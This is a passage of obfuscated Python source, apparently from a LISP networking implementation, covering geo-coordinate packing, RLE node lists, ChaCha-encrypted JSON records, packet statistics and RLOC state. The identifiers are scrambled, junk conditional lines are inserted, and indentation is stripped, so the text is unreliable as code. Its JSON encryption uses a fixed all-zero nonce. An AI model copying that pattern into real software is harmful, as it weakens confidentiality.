iIIiII1iIII1i = iII1i
return ( ( I11111i1 , iIIiII1iIII1i ) )
if 95 - 95: O0
if 45 - 45: I1Ii111 + OoooooooOO . i11iIiiIii
def get_distance ( self , geo_point ) :
oooOoOoooo = self . dms_to_decimal ( )
iiIi1iI1Ii = geo_point . dms_to_decimal ( )
i1iI = geopy . distance . distance ( oooOoOoooo , iiIi1iI1Ii )
return ( i1iI . km )
if 33 - 33: Oo0Ooo + OoO0O00
if 62 - 62: oO0o / I1IiiI
def point_in_circle ( self , geo_point ) :
Oo00 = self . get_distance ( geo_point )
return ( Oo00 <= self . radius )
if 38 - 38: ooOoO0o . OoooooooOO - II111iiii * i11iIiiIii / i1IIi . OoooooooOO
if 51 - 51: oO0o - I1ii11iIi11i + I1ii11iIi11i
def encode_geo ( self ) :
O0oOo = socket . htons ( LISP_AFI_LCAF )
IiiiIiiiiI = socket . htons ( 20 + 2 )
IIi1 = 0
if 100 - 100: I11i - I1ii11iIi11i . i1IIi
o0OO0 = abs ( self . latitude )
oOOOoii111Ii1iiII1 = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
if ( self . latitude < 0 ) : IIi1 |= 0x40
if 62 - 62: OoooooooOO
ii11II1I1 = abs ( self . longitude )
O0O0O = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
if ( self . longitude < 0 ) : IIi1 |= 0x20
if 74 - 74: iII111i / OoOoOO00
oO0OoO0oo0 = 0
if ( self . no_geo_altitude ( ) == False ) :
oO0OoO0oo0 = socket . htonl ( self . altitude )
IIi1 |= 0x10
if 82 - 82: I1Ii111
Oo0OOoO0oo0oO = socket . htons ( self . radius )
if ( Oo0OOoO0oo0oO != 0 ) : IIi1 |= 0x06
if 78 - 78: I1Ii111 % oO0o * iIii1I11I1II1
iii = struct . pack ( "HBBBBH" , O0oOo , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
0 , IiiiIiiiiI )
iii += struct . pack ( "BBHBBHBBHIHHH" , IIi1 , 0 , 0 , o0OO0 , oOOOoii111Ii1iiII1 >> 16 ,
socket . htons ( oOOOoii111Ii1iiII1 & 0x0ffff ) , ii11II1I1 , O0O0O >> 16 ,
socket . htons ( O0O0O & 0xffff ) , oO0OoO0oo0 , Oo0OOoO0oo0oO , 0 , 0 )
if 2 - 2: OOooOOo % Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
return ( iii )
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
def decode_geo ( self , packet , lcaf_len , radius_hi ) :
Iii1iIII1Iii = "BBHBBHBBHIHHH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( lcaf_len < oOoOo000Ooooo ) : return ( None )
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
IIi1 , i1Iii1 , i1111111II , o0OO0 , ooooo0o0 , oOOOoii111Ii1iiII1 , ii11II1I1 , oO0OOoOOo , O0O0O , oO0OoO0oo0 , Oo0OOoO0oo0oO , i1I11III , O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii ,
# iIii1I11I1II1 % i11iIiiIii * I1Ii111
packet [ : oOoOo000Ooooo ] )
if 48 - 48: I11i * OoO0O00 - OoO0O00
if 88 - 88: I11i * iII111i . I1Ii111 * IiII - I1Ii111
if 79 - 79: iIii1I11I1II1
if 4 - 4: i1IIi % iIii1I11I1II1 + Oo0Ooo + OOooOOo % oO0o
O0ooO0O00oo0 = socket . ntohs ( O0ooO0O00oo0 )
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) : return ( None )
if 76 - 76: ooOoO0o . iII111i
if ( IIi1 & 0x40 ) : o0OO0 = - o0OO0
self . latitude = o0OO0
OOoooOooOO = old_div ( ( ( ooooo0o0 << 16 ) | socket . ntohs ( oOOOoii111Ii1iiII1 ) ) , 1000 )
self . lat_mins = old_div ( OOoooOooOO , 60 )
self . lat_secs = OOoooOooOO % 60
if 69 - 69: i11iIiiIii * I1IiiI - o0oOOo0O0Ooo
if ( IIi1 & 0x20 ) : ii11II1I1 = - ii11II1I1
self . longitude = ii11II1I1
O0000Ooo0OO0 = old_div ( ( ( oO0OOoOOo << 16 ) | socket . ntohs ( O0O0O ) ) , 1000 )
self . long_mins = old_div ( O0000Ooo0OO0 , 60 )
self . long_secs = O0000Ooo0OO0 % 60
if 58 - 58: o0oOOo0O0Ooo - IiII
self . altitude = socket . ntohl ( oO0OoO0oo0 ) if ( IIi1 & 0x10 ) else - 1
Oo0OOoO0oo0oO = socket . ntohs ( Oo0OOoO0oo0oO )
self . radius = Oo0OOoO0oo0oO if ( IIi1 & 0x02 ) else Oo0OOoO0oo0oO * 1000
if 77 - 77: iIii1I11I1II1 + Ii1I + oO0o . i11iIiiIii - iIii1I11I1II1 % ooOoO0o
self . geo_name = None
packet = packet [ oOoOo000Ooooo : : ]
if 53 - 53: i11iIiiIii / OoOoOO00 % o0oOOo0O0Ooo / IiII
if ( O0ooO0O00oo0 != 0 ) :
self . rloc . afi = O0ooO0O00oo0
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 88 - 88: ooOoO0o . i1IIi
return ( packet )
if 21 - 21: OoO0O00 * I1ii11iIi11i + I1ii11iIi11i
if 36 - 36: Ii1I . OOooOOo * iIii1I11I1II1 - i1IIi
if 38 - 38: Oo0Ooo . o0oOOo0O0Ooo % oO0o / i11iIiiIii * OoO0O00 % OoOoOO00
if 18 - 18: OOooOOo
if 12 - 12: I1Ii111 % II111iiii / o0oOOo0O0Ooo - iIii1I11I1II1 + II111iiii
if 41 - 41: OOooOOo
class lisp_rle_node ( object ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . level = 0
self . translated_port = 0
self . rloc_name = None
if 8 - 8: i11iIiiIii . IiII . I1ii11iIi11i + i1IIi % I1Ii111
if 64 - 64: I1IiiI . Oo0Ooo * OoO0O00
def copy_rle_node ( self ) :
IIIi11i1 = lisp_rle_node ( )
IIIi11i1 . address . copy_address ( self . address )
IIIi11i1 . level = self . level
IIIi11i1 . translated_port = self . translated_port
IIIi11i1 . rloc_name = self . rloc_name
return ( IIIi11i1 )
if 87 - 87: i1IIi / OoooooooOO
if 68 - 68: I1Ii111 / iIii1I11I1II1
def store_translated_rloc ( self , rloc , port ) :
self . address . copy_address ( rloc )
self . translated_port = port
if 8 - 8: ooOoO0o * IiII * OOooOOo / I1IiiI
if 40 - 40: i11iIiiIii + OoooooooOO
def get_encap_keys ( self ) :
O00oo0o0o0oo = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 2 - 2: o0oOOo0O0Ooo * OoO0O00
Oo0o = self . address . print_address_no_iid ( ) + ":" + O00oo0o0o0oo
if 88 - 88: Oo0Ooo + oO0o + iII111i
try :
O0o0O0 = lisp_crypto_keys_by_rloc_encap [ Oo0o ]
if ( O0o0O0 [ 1 ] ) : return ( O0o0O0 [ 1 ] . encrypt_key , O0o0O0 [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 51 - 51: i1IIi + i11iIiiIii * I11i / iII111i + OoooooooOO
if 89 - 89: i11iIiiIii - I1Ii111 - O0 % iIii1I11I1II1 / IiII - O0
if 63 - 63: OOooOOo
if 23 - 23: Oo0Ooo / i1IIi - OOooOOo / Oo0Ooo
class lisp_rle ( object ) :
def __init__ ( self , name ) :
self . rle_name = name
self . rle_nodes = [ ]
self . rle_forwarding_list = [ ]
if 16 - 16: o0oOOo0O0Ooo - iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i + IiII
if 73 - 73: OOooOOo % I1Ii111 + OoooooooOO / I1ii11iIi11i * oO0o % oO0o
def copy_rle ( self ) :
IIiiiI = lisp_rle ( self . rle_name )
for IIIi11i1 in self . rle_nodes :
IIiiiI . rle_nodes . append ( IIIi11i1 . copy_rle_node ( ) )
if 25 - 25: I1Ii111
IIiiiI . build_forwarding_list ( )
return ( IIiiiI )
if 93 - 93: OoO0O00
if 62 - 62: Oo0Ooo . iII111i
def print_rle ( self , html , do_formatting ) :
IIIi1iI1 = ""
for IIIi11i1 in self . rle_nodes :
O00oo0o0o0oo = IIIi11i1 . translated_port
if 15 - 15: i11iIiiIii * I11i + oO0o
o0OoOO0oO0o0oOoO = ""
if ( IIIi11i1 . rloc_name != None ) :
o0OoOO0oO0o0oOoO = IIIi11i1 . rloc_name
if ( do_formatting ) : o0OoOO0oO0o0oOoO = blue ( o0OoOO0oO0o0oOoO , html )
o0OoOO0oO0o0oOoO = "({})" . format ( o0OoOO0oO0o0oOoO )
if 30 - 30: II111iiii / II111iiii
if 70 - 70: OoO0O00 + O0 * OoO0O00
Oo0o = IIIi11i1 . address . print_address_no_iid ( )
if ( IIIi11i1 . address . is_local ( ) ) : Oo0o = red ( Oo0o , html )
IIIi1iI1 += "{}{}{}, " . format ( Oo0o , "" if O00oo0o0o0oo == 0 else ":" + str ( O00oo0o0o0oo ) , o0OoOO0oO0o0oOoO )
if 25 - 25: OoooooooOO . Oo0Ooo + OOooOOo + Oo0Ooo * O0 % i1IIi
if 71 - 71: II111iiii / Ii1I + i1IIi - OoOoOO00 + Ii1I
return ( IIIi1iI1 [ 0 : - 2 ] if IIIi1iI1 != "" else "" )
if 31 - 31: OoooooooOO * Ii1I - iII111i . oO0o % Ii1I
if 97 - 97: Ii1I
def build_forwarding_list ( self ) :
O0oo0O0 = - 1
for IIIi11i1 in self . rle_nodes :
if ( O0oo0O0 == - 1 ) :
if ( IIIi11i1 . address . is_local ( ) ) : O0oo0O0 = IIIi11i1 . level
else :
if ( IIIi11i1 . level > O0oo0O0 ) : break
if 51 - 51: II111iiii . oO0o % iII111i
if 47 - 47: II111iiii - iII111i * I1IiiI . IiII
O0oo0O0 = 0 if O0oo0O0 == - 1 else IIIi11i1 . level
if 41 - 41: OoOoOO00 / O0 + I1Ii111 . I1ii11iIi11i
self . rle_forwarding_list = [ ]
for IIIi11i1 in self . rle_nodes :
if ( IIIi11i1 . level == O0oo0O0 or ( O0oo0O0 == 0 and
IIIi11i1 . level == 128 ) ) :
if ( lisp_i_am_rtr == False and IIIi11i1 . address . is_local ( ) ) :
Oo0o = IIIi11i1 . address . print_address_no_iid ( )
lprint ( "Exclude local RLE RLOC {}" . format ( Oo0o ) )
continue
if 48 - 48: Ii1I . o0oOOo0O0Ooo * O0 / OoooooooOO + I1Ii111 + Oo0Ooo
self . rle_forwarding_list . append ( IIIi11i1 )
if 92 - 92: Ii1I - o0oOOo0O0Ooo % I1IiiI + I1Ii111
if 3 - 3: iIii1I11I1II1 + i11iIiiIii
if 49 - 49: OoOoOO00 % iIii1I11I1II1 + I1Ii111
if 38 - 38: i11iIiiIii
if 75 - 75: iIii1I11I1II1 / OoO0O00 * OOooOOo % O0
class lisp_json ( object ) :
def __init__ ( self , name , string , encrypted = False , ms_encrypt = False ) :
if 82 - 82: Oo0Ooo / i1IIi . i1IIi / oO0o
if 7 - 7: Oo0Ooo . iII111i % I1ii11iIi11i / iII111i
if 93 - 93: iII111i
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
if ( type ( string ) == bytes ) : string = string . decode ( )
if 32 - 32: II111iiii
self . json_name = name
self . json_encrypted = False
try :
json . loads ( string )
except :
lprint ( "Invalid JSON string: '{}'" . format ( string ) )
string = '{ "?" : "?" }'
if 58 - 58: I1IiiI - o0oOOo0O0Ooo - I1Ii111 . O0 % OoO0O00 . I11i
self . json_string = string
if 41 - 41: iII111i . I1Ii111 - IiII / O0
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
if 25 - 25: Oo0Ooo * oO0o
if 78 - 78: OoOoOO00 / II111iiii
if 6 - 6: I1Ii111 . OoOoOO00
if 75 - 75: Oo0Ooo + I11i
if 87 - 87: I1IiiI
if 36 - 36: OoO0O00 . ooOoO0o . O0 / OoO0O00
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
if ( len ( lisp_ms_json_keys ) != 0 ) :
if ( ms_encrypt == False ) : return
self . json_key_id = list ( lisp_ms_json_keys . keys ( ) ) [ 0 ]
self . json_key = lisp_ms_json_keys [ self . json_key_id ]
self . encrypt_json ( )
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
if 72 - 72: I1ii11iIi11i
if ( lisp_log_id == "lig" and encrypted ) :
III11II111 = os . getenv ( "LISP_JSON_KEY" )
if ( III11II111 != None ) :
OOOooo0OooOoO = - 1
if ( III11II111 [ 0 ] == "[" and "]" in III11II111 ) :
OOOooo0OooOoO = III11II111 . find ( "]" )
self . json_key_id = int ( III11II111 [ 1 : OOOooo0OooOoO ] )
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
self . json_key = III11II111 [ OOOooo0OooOoO + 1 : : ]
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
self . decrypt_json ( )
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
if 89 - 89: Oo0Ooo % IiII
if 36 - 36: IiII % OoOoOO00 % I1ii11iIi11i
if 7 - 7: I1ii11iIi11i % OoOoOO00 - O0 . I1Ii111
def add ( self ) :
self . delete ( )
lisp_json_list [ self . json_name ] = self
if 9 - 9: Ii1I . OoooooooOO / ooOoO0o + i1IIi
if 90 - 90: oO0o - OoOoOO00 % ooOoO0o
def delete ( self ) :
if ( self . json_name in lisp_json_list ) :
del ( lisp_json_list [ self . json_name ] )
lisp_json_list [ self . json_name ] = None
if 83 - 83: OOooOOo - I1ii11iIi11i + OoO0O00
if 99 - 99: iII111i - OoOoOO00 % ooOoO0o
if 27 - 27: oO0o . oO0o * iII111i % iIii1I11I1II1
def print_json ( self , html ) :
o0ooOoooO0oOO = self . json_string
ooOiIi11I = "***"
if ( html ) : ooOiIi11I = red ( ooOiIi11I , html )
iI111ii1IiI = ooOiIi11I + self . json_string + ooOiIi11I
if ( self . valid_json ( ) ) : return ( o0ooOoooO0oOO )
return ( iI111ii1IiI )
if 7 - 7: I1IiiI - o0oOOo0O0Ooo + O0
if 13 - 13: OoO0O00
def valid_json ( self ) :
try :
json . loads ( self . json_string )
except :
return ( False )
if 56 - 56: OoOoOO00 . ooOoO0o * oO0o - I11i
return ( True )
if 47 - 47: oO0o . i1IIi * I1ii11iIi11i % OOooOOo % IiII / Oo0Ooo
if 39 - 39: i11iIiiIii . OOooOOo + Oo0Ooo
def encrypt_json ( self ) :
OoooOOoOO = self . json_key . zfill ( 32 )
iI1ii = "0" * 8
if 92 - 92: O0 * Oo0Ooo / o0oOOo0O0Ooo % OoO0O00
ooo0 = json . loads ( self . json_string )
for III11II111 in ooo0 :
iiIiII11i1 = ooo0 [ III11II111 ]
if ( type ( iiIiII11i1 ) != str ) : iiIiII11i1 = str ( iiIiII11i1 )
iiIiII11i1 = chacha . ChaCha ( OoooOOoOO , iI1ii ) . encrypt ( iiIiII11i1 )
ooo0 [ III11II111 ] = binascii . hexlify ( iiIiII11i1 )
if 6 - 6: I1IiiI * I1Ii111 % I1IiiI - II111iiii . oO0o
self . json_string = json . dumps ( ooo0 )
self . json_encrypted = True
if 9 - 9: I1Ii111 . i11iIiiIii * I11i + o0oOOo0O0Ooo
if 85 - 85: i11iIiiIii * iII111i
def decrypt_json ( self ) :
OoooOOoOO = self . json_key . zfill ( 32 )
iI1ii = "0" * 8
if 43 - 43: Ii1I + iII111i * I1ii11iIi11i * Ii1I
ooo0 = json . loads ( self . json_string )
for III11II111 in ooo0 :
iiIiII11i1 = binascii . unhexlify ( ooo0 [ III11II111 ] )
ooo0 [ III11II111 ] = chacha . ChaCha ( OoooOOoOO , iI1ii ) . encrypt ( iiIiII11i1 )
if 62 - 62: O0
try :
self . json_string = json . dumps ( ooo0 )
self . json_encrypted = False
except :
pass
if 44 - 44: i1IIi
if 27 - 27: ooOoO0o - Oo0Ooo + i11iIiiIii - oO0o % O0
if 68 - 68: iIii1I11I1II1 % Ii1I / I11i
if 17 - 17: IiII * Oo0Ooo . i11iIiiIii . IiII . Oo0Ooo % IiII
if 93 - 93: II111iiii - IiII - O0 - i11iIiiIii / OOooOOo
if 76 - 76: OOooOOo
if 31 - 31: OOooOOo + i1IIi / Ii1I / OoOoOO00 % OoO0O00 + Oo0Ooo
class lisp_stats ( object ) :
def __init__ ( self ) :
self . packet_count = 0
self . byte_count = 0
self . last_rate_check = 0
self . last_packet_count = 0
self . last_byte_count = 0
self . last_increment = None
if 84 - 84: i1IIi / i1IIi * oO0o * i11iIiiIii
if 92 - 92: iII111i - Ii1I . iIii1I11I1II1 . iII111i + ooOoO0o % OoOoOO00
def increment ( self , octets ) :
self . packet_count += 1
self . byte_count += octets
self . last_increment = lisp_get_timestamp ( )
if 38 - 38: OOooOOo . I11i - oO0o
if 85 - 85: O0 * I1IiiI . Oo0Ooo - IiII
def recent_packet_sec ( self ) :
if ( self . last_increment == None ) : return ( False )
Ii1i1 = time . time ( ) - self . last_increment
return ( Ii1i1 <= 1 )
if 84 - 84: I1Ii111 . iIii1I11I1II1 . O0 * I1ii11iIi11i
if 59 - 59: i1IIi . o0oOOo0O0Ooo . Oo0Ooo * I1Ii111 + OoooooooOO
def recent_packet_min ( self ) :
if ( self . last_increment == None ) : return ( False )
Ii1i1 = time . time ( ) - self . last_increment
return ( Ii1i1 <= 60 )
if 11 - 11: I11i * ooOoO0o % iIii1I11I1II1 - O0
if 68 - 68: ooOoO0o * OoooooooOO - OoooooooOO
def stat_colors ( self , c1 , c2 , html ) :
if ( self . recent_packet_sec ( ) ) :
return ( green_last_sec ( c1 ) , green_last_sec ( c2 ) )
if 59 - 59: Ii1I / I11i / I1Ii111 + IiII * I1ii11iIi11i
if ( self . recent_packet_min ( ) ) :
return ( green_last_min ( c1 ) , green_last_min ( c2 ) )
if 18 - 18: O0
return ( c1 , c2 )
if 60 - 60: II111iiii % O0 - I1Ii111 / iII111i / I1IiiI
if 59 - 59: O0 / iIii1I11I1II1
def normalize ( self , count ) :
count = str ( count )
iiIIiI = len ( count )
if ( iiIIiI > 12 ) :
count = count [ 0 : - 10 ] + "." + count [ - 10 : - 7 ] + "T"
return ( count )
if 56 - 56: ooOoO0o
if ( iiIIiI > 9 ) :
count = count [ 0 : - 9 ] + "." + count [ - 9 : - 7 ] + "B"
return ( count )
if 94 - 94: OoOoOO00
if ( iiIIiI > 6 ) :
count = count [ 0 : - 6 ] + "." + count [ - 6 ] + "M"
return ( count )
if 12 - 12: I11i * OoooooooOO + ooOoO0o
return ( count )
if 16 - 16: IiII
if 100 - 100: OoO0O00 % Oo0Ooo - OoooooooOO
def get_stats ( self , summary , html ) :
i111 = self . last_rate_check
iII1I = self . last_packet_count
O0oO0Ooo00Oo = self . last_byte_count
self . last_rate_check = lisp_get_timestamp ( )
self . last_packet_count = self . packet_count
self . last_byte_count = self . byte_count
if 92 - 92: O0 % II111iiii . i11iIiiIii
iiO0 = self . last_rate_check - i111
if ( iiO0 == 0 ) :
oO0o00000o = 0
iIiIiiIII1I1 = 0
else :
oO0o00000o = int ( old_div ( ( self . packet_count - iII1I ) ,
iiO0 ) )
iIiIiiIII1I1 = old_div ( ( self . byte_count - O0oO0Ooo00Oo ) , iiO0 )
iIiIiiIII1I1 = old_div ( ( iIiIiiIII1I1 * 8 ) , 1000000 )
iIiIiiIII1I1 = round ( iIiIiiIII1I1 , 2 )
if 8 - 8: i11iIiiIii * i1IIi . Oo0Ooo + I11i * I11i . OoOoOO00
if 68 - 68: OoooooooOO + OoOoOO00 + i11iIiiIii
if 89 - 89: Oo0Ooo + Ii1I * O0 - I1Ii111
if 33 - 33: iIii1I11I1II1 . I11i
if 63 - 63: oO0o - iII111i
I11ii = self . normalize ( self . packet_count )
I111iIi1I = self . normalize ( self . byte_count )
if 100 - 100: II111iiii - O0 / oO0o - I11i % OOooOOo + Oo0Ooo
if 2 - 2: iII111i % OoOoOO00 + OoOoOO00 + o0oOOo0O0Ooo / ooOoO0o
if 12 - 12: i1IIi + II111iiii / o0oOOo0O0Ooo
if 81 - 81: I1Ii111 . Ii1I * ooOoO0o . IiII - OoOoOO00
if 79 - 79: ooOoO0o - O0
if ( summary ) :
o000oooOOO0OO = "<br>" if html else ""
I11ii , I111iIi1I = self . stat_colors ( I11ii , I111iIi1I , html )
Iii1I11iIiI1 = "packet-count: {}{}byte-count: {}" . format ( I11ii , o000oooOOO0OO , I111iIi1I )
Ooo0oOo = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( oO0o00000o , iIiIiiIII1I1 )
if 100 - 100: I1IiiI
if ( html != "" ) : Ooo0oOo = lisp_span ( Iii1I11iIiI1 , Ooo0oOo )
else :
iIIi1111IiI1 = str ( oO0o00000o )
iIi11iI1 = str ( iIiIiiIII1I1 )
if ( html ) :
I11ii = lisp_print_cour ( I11ii )
iIIi1111IiI1 = lisp_print_cour ( iIIi1111IiI1 )
I111iIi1I = lisp_print_cour ( I111iIi1I )
iIi11iI1 = lisp_print_cour ( iIi11iI1 )
if 83 - 83: ooOoO0o * i1IIi / I1Ii111
o000oooOOO0OO = "<br>" if html else ", "
if 94 - 94: II111iiii + OoooooooOO . i1IIi + OoO0O00 + OoOoOO00
Ooo0oOo = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( I11ii , o000oooOOO0OO , iIIi1111IiI1 , o000oooOOO0OO , I111iIi1I , o000oooOOO0OO ,
# I1Ii111 / OoOoOO00 % Ii1I % I1IiiI
iIi11iI1 )
if 93 - 93: o0oOOo0O0Ooo * II111iiii - iIii1I11I1II1 + oO0o + II111iiii / Oo0Ooo
return ( Ooo0oOo )
if 74 - 74: OoooooooOO * IiII / OoOoOO00 * OoO0O00 * I11i
if 70 - 70: OoO0O00 / I1ii11iIi11i - iIii1I11I1II1 % o0oOOo0O0Ooo / i1IIi + IiII
if 95 - 95: O0
if 67 - 67: OOooOOo / I11i - I1Ii111 % i11iIiiIii
if 3 - 3: oO0o + iII111i + OOooOOo
if 54 - 54: i11iIiiIii + OoO0O00 - IiII - iII111i / I11i
if 85 - 85: OOooOOo * OOooOOo * I1Ii111 - ooOoO0o . O0 % iII111i
if 5 - 5: i1IIi * iII111i . o0oOOo0O0Ooo - I1ii11iIi11i
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 84 - 84: i1IIi
if 17 - 17: IiII + iII111i * OoO0O00 / iII111i
if 67 - 67: i1IIi * IiII . OoOoOO00 % iIii1I11I1II1 - iIii1I11I1II1 * I1ii11iIi11i
if 96 - 96: iII111i / i11iIiiIii / oO0o + Oo0Ooo
class lisp_rloc ( object ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = lisp_get_timestamp ( )
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . rloc_probe_latency = "?/?"
self . recent_rloc_probe_latencies = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
self . multicast_rloc_probe_list = { }
if 65 - 65: OoOoOO00
if ( recurse == False ) : return
if 87 - 87: I11i % i1IIi + i11iIiiIii * II111iiii
if 58 - 58: OoO0O00 * I1IiiI - II111iiii / Ii1I - I1IiiI % OoooooooOO
if 33 - 33: IiII / i1IIi + I1Ii111
if 5 - 5: O0 / iII111i % II111iiii . Oo0Ooo - I11i
if 84 - 84: oO0o * iII111i % i11iIiiIii - O0 . iIii1I11I1II1 - OoOoOO00
if 73 - 73: OoOoOO00
oOOooo = lisp_get_default_route_next_hops ( )
if ( oOOooo == [ ] or len ( oOOooo ) == 1 ) : return
if 27 - 27: OoOoOO00 - OoOoOO00 % II111iiii + i1IIi + I1IiiI
self . rloc_next_hop = oOOooo [ 0 ]
i1Ii = self
for ooOoOoO00OO0oooo in oOOooo [ 1 : : ] :
oO0O0 = lisp_rloc ( False )
oO0O0 = copy . deepcopy ( self )
oO0O0 . rloc_next_hop = ooOoOoO00OO0oooo
i1Ii . next_rloc = oO0O0
i1Ii = oO0O0
if 6 - 6: oO0o - OoO0O00
if 44 - 44: Oo0Ooo + I1ii11iIi11i % Oo0Ooo / I11i
if 57 - 57: Oo0Ooo + Ii1I * OoooooooOO
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 30 - 30: O0
if 70 - 70: oO0o
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 89 - 89: O0
if 3 - 3: iII111i - O0 / I11i
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 46 - 46: I1IiiI . OoooooooOO / iIii1I11I1II1 - ooOoO0o * OOooOOo
if 55 - 55: o0oOOo0O0Ooo + iIii1I11I1II1 / I11i
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 97 - 97: i11iIiiIii
if 71 - 71: oO0o + Oo0Ooo
if 7 - 7: OoOoOO00 / I1ii11iIi11i * i1IIi
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 87 - 87: OoooooooOO * IiII - I1IiiI % I1ii11iIi11i % iIii1I11I1II1
if 28 - 28: I1Ii111 / o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo . Ii1I / I11i
def print_rloc ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , i1 , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 43 - 43: I1Ii111 . I1IiiI
if 16 - 16: i11iIiiIii * Oo0Ooo * Ii1I / OoOoOO00 / OOooOOo
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oOo = self . rloc_name
if ( cour ) : oOo = lisp_print_cour ( oOo )
return ( 'rloc-name: {}' . format ( blue ( oOo , cour ) ) )
if 11 - 11: o0oOOo0O0Ooo * OoO0O00 . o0oOOo0O0Ooo - I1IiiI / IiII - OOooOOo
if 19 - 19: i1IIi + IiII . OoO0O00 / O0 - I1Ii111 - Oo0Ooo
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
O00oo0o0o0oo = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 24 - 24: iII111i + i1IIi
if 31 - 31: OoOoOO00
if 37 - 37: iIii1I11I1II1 % IiII / i11iIiiIii - oO0o
if 43 - 43: II111iiii - OoooooooOO
OooOOoOO0OO = self . rloc
if ( OooOOoOO0OO . is_null ( ) == False ) :
i1II11 = lisp_get_nat_info ( OooOOoOO0OO , self . rloc_name )
if ( i1II11 ) :
O00oo0o0o0oo = i1II11 . port
i1IiII = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
Oo0o = OooOOoOO0OO . print_address_no_iid ( )
o00oO = red ( Oo0o , False )
IiIi1 = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 50 - 50: I1ii11iIi11i * I1IiiI / OoO0O00 / i1IIi / ooOoO0o . ooOoO0o
if 22 - 22: I11i % iIii1I11I1II1 - i11iIiiIii * OoOoOO00 - I1Ii111
if 97 - 97: i11iIiiIii . OoOoOO00 + oO0o * O0 % OoO0O00 - Ii1I
if 46 - 46: I1Ii111
if 87 - 87: o0oOOo0O0Ooo - iII111i * OoO0O00 * o0oOOo0O0Ooo . o0oOOo0O0Ooo / OOooOOo
if 50 - 50: i11iIiiIii - II111iiii * OoooooooOO + II111iiii - ooOoO0o
if ( i1II11 . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( o00oO , O00oo0o0o0oo , IiIi1 ) )
if 52 - 52: i1IIi + i1IIi * i1IIi / OoOoOO00
if 98 - 98: iII111i . i1IIi + o0oOOo0O0Ooo * OoooooooOO - i11iIiiIii
